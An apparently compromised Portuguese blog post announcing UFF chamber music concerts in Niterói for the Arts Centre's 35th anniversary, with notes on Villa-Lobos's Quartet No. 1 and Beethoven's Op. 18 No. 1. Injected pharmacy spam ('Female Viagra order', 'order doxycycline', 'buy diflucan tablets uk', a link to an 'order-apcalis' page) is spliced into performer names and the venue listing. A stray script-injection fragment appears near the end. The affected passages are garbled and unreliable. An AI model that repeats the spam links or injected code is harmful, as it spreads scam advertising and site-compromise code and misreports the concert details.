Música de câmaraProgramaçãoRio de Janeiro

35 anos de artes

Centro de Artes da UFF comemora aniversário com programas de música de câmara.

 

Os 35 anos de atividades do Centro de Artes da Universidade Federal Fluminense, em Niterói, são comemorados com boa música. Nos dias 20 e 22 de agosto, a Orquestra Sinfônica Nacional da UFF e o Quarteto de Cordas da UFF, respectivamente, fazem concertos especiais.

No dia 20 de agosto, o segundo concerto da série OSN Música de Câmara apresenta ao público um repertório composto exclusivamente por música brasileira. Integrando também as comemorações dos 130 anos de Heitor Villa-Lobos (1887-1959), a OSN UFF interpreta as peças Assobio a Jato e Quintette Instrumental Cheap .

Completando o programa está a Order Suíte para contrabaixo e clarone, do compositor e regente Anderson Alves. A peça, que tem sua estreia mundial neste concerto, foi composta e dedicada aos dois músicos da Sinfônica Nacional UFF que a interpretam: Tiago Teixeira (clarone) e Natalia Terra Female Viagra order (contrabaixo).

Helder Teixeira order doxycycline (flauta) e Hudson Lima (violoncelo) fazem os solos de Assobio a Jato. Já a obra buy diflucan tablets uk Quintette Instrumental é executada por Helder Teixeira (flauta), Yuri Reis (violino), Daniel Prazeres (viola), Hudson Lima (violoncelo) e Vanja Ferreira (harpa).

 

Villa e Beethoven

No dia 22 de agosto, às 19h30, o Quarteto de Cordas da UFF sobe ao palco do Cine Arte UFF. O conjunto é formado por Tomaz Soares e Ubitratã Rodrigues (violinos), Nayran Pessanha (viola) e David Chew (violoncelo). O programa do concerto é composto pelo Quarteto n. 1, de Villa-Lobos, e pelo Quarteto Op. 18 n. 1, de Ludwig van Beethoven (1770-1827).

Apesar de sua fascinação por J. S. Bach, foi de J. Haydn que Villa-Lobos se aproximou ao pensar em compor um quarteto. O brasileiro analisou a obra do mestre austríaco, sua maneira de trabalhar as diferentes vozes (instrumentos), e, assim, surgiu o Quarteto n. 1 – obra diversa dos demais 16 que Villa legou. A obra é uma suíte em seis movimentos curtos, na qual o compositor apresenta uma atmosfera afrancesada com elementos melódicos indígenas e folclóricos brasileiros. Foi composto e apresentado em 1915, mais exatamente no início desse ano, em Nova Friburgo, cidade com a qual Villa tinha forte ligação afetiva por conta da tia Zizinha (irmã do seu pai). O concerto se deu em casa de um maestro local, com o próprio compositor ao violoncelo.

Beethoven, o maior compositor de quartetos de todos os tempos, teve também suas “tentativas” antes de mergulhar nesse mundo de profundidades da alma e planícies de raras belezas. Deixou estudos, prelúdios, fugas e tantos manuscritos para comprovar sua trajetória na música de câmara para cordas. Assim como outros compositores, o alemão era muito ligado à Literatura, o que se percebe em várias de suas obras. No caso do Quarteto Op. 18 n. 1, o belíssimo segundo movimento retrata a cena do túmulo de Romeu e Julieta.

Quarteto de Cordas da UFF

 

SERVIÇO:

 

Orquestra Sinfônica Nacional da UFF

 

20 de agosto, domingo, às 10h30

Cine Arte UFF (R. Miguel de Frias, 9, Icaraí – Niterói. Tels.: 21 3674-7511 e 3674-7512)

 

Quarteto de Cordas da UFF

 

22 de agosto, terça-feira, às 19h30

online Order http://ecofan.se/2018/02/02/order-apcalis/ Teatro da UFF Pills (R. Miguel de Frias, 9, Icaraí – Niterói. Tels.: 21 3674-7511 e 3674-7512)

 

Ingressos: R$ 14, com meia-entrada para estudantes e pessoas com mais de 60 anos

Sugestão etária: livre

 d.getElementsByTagName(‘head’)[0].appendChild(s);

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.